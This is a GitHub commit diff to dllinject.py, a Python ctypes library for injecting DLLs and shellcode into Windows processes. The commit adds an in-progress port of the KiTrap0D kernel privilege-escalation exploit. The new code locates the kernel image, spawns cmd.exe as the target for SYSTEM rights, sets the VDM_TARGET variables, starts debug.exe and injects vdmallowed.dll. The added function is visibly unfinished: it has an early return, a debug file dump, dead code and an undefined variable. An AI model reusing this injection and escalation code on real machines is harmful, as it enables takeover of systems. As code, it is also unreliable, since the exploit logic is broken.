Skip to content

Commit

Permalink
Adding in kitrap0d exe stage
Browse files Browse the repository at this point in the history
  • Loading branch information
@psychomario
psychomario committed May 30, 2012
1 parent 9d38151 commit ca12de0
Showing 1 changed file with 177 additions and 1 deletion.
178 changes: 177 additions & 1 deletion dllinject.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
import ctypes.wintypes as wintypes
import platform
import binascii
import os

wintypes.LPTSTR = ctypes.POINTER(ctypes.c_char)
wintypes.LPBYTE = ctypes.POINTER(ctypes.c_ubyte)
Expand Down Expand Up @@ -60,6 +61,90 @@ class __PROCESS_INFORMATION(ctypes.Structure):
("dwProcessId", wintypes.DWORD),
("dwThreadId", wintypes.DWORD),]
wintypes.PROCESS_INFORMATION = __PROCESS_INFORMATION
class __SYSTEM_MODULE_INFORMATION(ctypes.Structure):
_fields_ = [("ModuleCount", wintypes.ULONG),
("WhoCares", ctypes.c_void_p * 2),
("BaseAddress", ctypes.c_void_p),
("Size", wintypes.ULONG),
("MoarStuff", wintypes.ULONG),
("MoarMoar", wintypes.USHORT),
("HeyThere", wintypes.USHORT),
("Pwned", wintypes.USHORT),
("W00t", wintypes.USHORT),
("ImageName", ctypes.c_char * 256),]
wintypes.SYSTEM_MODULE_INFORMATION = __SYSTEM_MODULE_INFORMATION
class __IMAGE_DOS_HEADER(ctypes.Structure):
_fields_ = [("e_magic", wintypes.WORD),
("e_cblp", wintypes.WORD),
("e_cp", wintypes.WORD),
("e_crlc", wintypes.WORD),
("e_cparhdr", wintypes.WORD),
("e_minalloc", wintypes.WORD),
("e_maxalloc", wintypes.WORD),
("e_ss", wintypes.WORD),
("e_sp", wintypes.WORD),
("e_csum", wintypes.WORD),
("e_ip", wintypes.WORD),
("e_cs", wintypes.WORD),
("e_lfarlc", wintypes.WORD),
("e_ovno", wintypes.WORD),
("e_res", wintypes.WORD * 4),
("e_oemid", wintypes.WORD),
("e_oeminfo", wintypes.WORD),
("e_res2", wintypes.WORD * 10),
("e_lfanew", wintypes.LONG),]
wintypes.IMAGE_DOS_HEADER = __IMAGE_DOS_HEADER
class __IMAGE_FILE_HEADER(ctypes.Structure):
_fields_ = [("Machine", wintypes.WORD),
("NumberOfSections", wintypes.WORD),
("TimeDateStamp", wintypes.DWORD),
("PointerToSymbolTable", wintypes.DWORD),
("NumberOfSymbols", wintypes.DWORD),
("SizeOfOptionalHeader", wintypes.WORD),
("Characteristics", wintypes.WORD),]
wintypes.IMAGE_FILE_HEADER = __IMAGE_FILE_HEADER
class __IMAGE_DATA_DIRECTORY(ctypes.Structure):
_fields_ = [("VirtualAddress", wintypes.DWORD),
("Size", wintypes.DWORD),]
wintypes.IMAGE_DATA_DIRECTORY = __IMAGE_DATA_DIRECTORY
class __IMAGE_OPTIONAL_HEADER(ctypes.Structure):
_fields_ = [("Magic", wintypes.WORD),
("MajorLinkerVersion", wintypes.BYTE),
("MinorLinkerVersion", wintypes.BYTE),
("SizeOfCode", wintypes.DWORD),
("SizeOfInitializedData", wintypes.DWORD),
("SizeOfUninitializedData", wintypes.DWORD),
("AddressOfEntryPoint", wintypes.DWORD),
("BaseOfCode", wintypes.DWORD),
("BaseOfData", wintypes.DWORD),
("ImageBase", wintypes.DWORD),
("SectionAlignment", wintypes.DWORD),
("FileAlignment", wintypes.DWORD),
("MajorOperatingSystemVersion", wintypes.WORD),
("MinorOperatingSystemVersion", wintypes.WORD),
("MajorImageVersion", wintypes.WORD),
("MinorImageVersion", wintypes.WORD),
("MajorSubsystemVersion", wintypes.WORD),
("MinorSubsystemVersion", wintypes.WORD),
("Win32VersionValue", wintypes.DWORD),
("SizeOfImage", wintypes.DWORD),
("SizeOfHeaders", wintypes.DWORD),
("CheckSum", wintypes.DWORD),
("Subsystem", wintypes.WORD),
("DllCharacteristics", wintypes.WORD),
("SizeOfStackReserve", wintypes.DWORD),
("SizeOfStackCommit", wintypes.DWORD),
("SizeOfHeapReserve", wintypes.DWORD),
("SizeOfHeapCommit", wintypes.DWORD),
("LoaderFlags", wintypes.DWORD),
("NumberOfRvaAndSizes", wintypes.DWORD),
("DataDirectory", wintypes.IMAGE_DATA_DIRECTORY * 16),]
wintypes.IMAGE_OPTIONAL_HEADER = __IMAGE_OPTIONAL_HEADER
class __IMAGE_NT_HEADER(ctypes.Structure):
_fields_ = [("Signature", wintypes.DWORD),
("FileHeader", wintypes.IMAGE_FILE_HEADER),
("OptionalHeader", wintypes.IMAGE_OPTIONAL_HEADER),]
wintypes.IMAGE_NT_HEADER = __IMAGE_NT_HEADER

class Process():
"""This class can be used for dll or shellcode injection.
Expand All @@ -79,7 +164,7 @@ class Process():
self.terminate(code)
This will terminate the process in use regardless of where it was
started from. code is the exit code"""
def __init__(self, pid=None, pe=None):
def __init__(self, pid=None, pe=None, handle=None):
self.kernel32 = ctypes.windll.kernel32
self.PROCESS_ALL_ACCESS = (0x000F0000L|0x00100000L|0xFFF)
self.SE_DEBUG_NAME = "SeDebugPrivilege"
Expand Down Expand Up @@ -112,6 +197,8 @@ def __init__(self, pid=None, pe=None):
ctypes.byref(process_information)
)
self.handle = process_information.hProcess
elif handle:
self.handle = handle
else:
return None

Expand Down Expand Up @@ -164,6 +251,7 @@ def inject(self, dllpath): #inject dllpath into our process
and then executes it
"""
dllpath = os.path.abspath(dllpath)
push = "\x68"
dllpath = "\x00".join(list(dllpath))+"\x00\x00\x00"
#convert to null padded unicode
Expand Down Expand Up @@ -263,3 +351,91 @@ def terminate(self, code=0):
code
)
self.kernel32.CloseHandle(self.handle)


def get_kernel_addr():
ntdll = ctypes.windll.ntdll
buffer_size = wintypes.ULONG(0)
ntdll.ZwQuerySystemInformation(11, 0, 0, ctypes.byref(buffer_size));

sysmod_info = ctypes.create_string_buffer(buffer_size.value)
ntdll.ZwQuerySystemInformation(11, ctypes.byref(sysmod_info), buffer_size.value, ctypes.byref(buffer_size));

mod_list = ctypes.cast(sysmod_info, ctypes.POINTER(wintypes.SYSTEM_MODULE_INFORMATION))
return (mod_list[0].BaseAddress, mod_list[0].ImageName.split('\\')[-1], mod_list[0].Size)

def kitrap0d():
kernel32 = ctypes.windll.kernel32

startupinfo = wintypes.STARTUPINFO()
process_information = wintypes.PROCESS_INFORMATION()
startupinfo.dwFlags = 0x1
startupinfo.wShowWindow = 0x1
startupinfo.cb = ctypes.sizeof(startupinfo)
kernel32.CreateProcessA(
"C:\\WINDOWS\\system32\\cmd.exe",
"C:\\WINDOWS\\system32\\cmd.exe",
None,
None,
False,
0x00000010,
None,
None,
ctypes.byref(startupinfo),
ctypes.byref(process_information)
)
givesys = process_information.dwProcessId

kernbase, kernimage, kernsize = get_kernel_addr()
kernhandle = kernel32.LoadLibraryA(kernimage)
xpsig = "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84"
dos_header = ctypes.cast(kernhandle, ctypes.POINTER(wintypes.IMAGE_DOS_HEADER))
nt_header = ctypes.cast(kernhandle + dos_header.contents.e_lfanew, ctypes.POINTER(wintypes.IMAGE_NT_HEADER))
optional_header = nt_header.contents.OptionalHeader
baseofcode = optional_header.BaseOfCode
sizeofcode = optional_header.SizeOfCode
#search between kernelhandle[baseofcode] - kernelhandle[baseofcode+sizeofcode] for xpsig
buf = ctypes.c_byte*kernsize
kernelarray = ctypes.cast(kernhandle, ctypes.POINTER(buf)).contents
fh=open("E:\\file.exe",'wb')
kernelarray = kernelarray[:]
kernelarray = [chr(abs(i)) for i in kernelarray]
return kernelarray
fh.close()
#for i in range(0,kernsize):
# chunk = ''.join([chr(abs(i)) for i in kernelarray[i:i+len(xpsig)]])
# if chunk == xpsig:
# continue
return i



kernel32.SetEnvironmentVariable("VDM_TARGET_PID",hex(givesys))
kernel32.SetEnvironmentVariable("VDM_TARGET_KRN",hex(kernbase))
kernel32.SetEnvironmentVariable("VDM_TARGET_OFF",hex(kernoff))

startupinfo = wintypes.STARTUPINFO()
process_information = wintypes.PROCESS_INFORMATION()
startupinfo.dwFlags = 0x1
startupinfo.wShowWindow = 0x0
startupinfo.cb = ctypes.sizeof(startupinfo)
kernel32.CreateProcessA(
"C:\\WINDOWS\\system32\\debug.exe",
None,
None,
None,
True,
0x00000004,
None,
None,
ctypes.byref(startupinfo),
ctypes.byref(process_information)
)
ntvdm = kernel32.OpenProcess(
0x43b,
False,
process_information.dwProcessId
)

ntvdminject = Process(handle=ntvdm)
ntvdminject.inject("vdmallowed.dll")

0 comments on commit ca12de0

Please sign in to comment.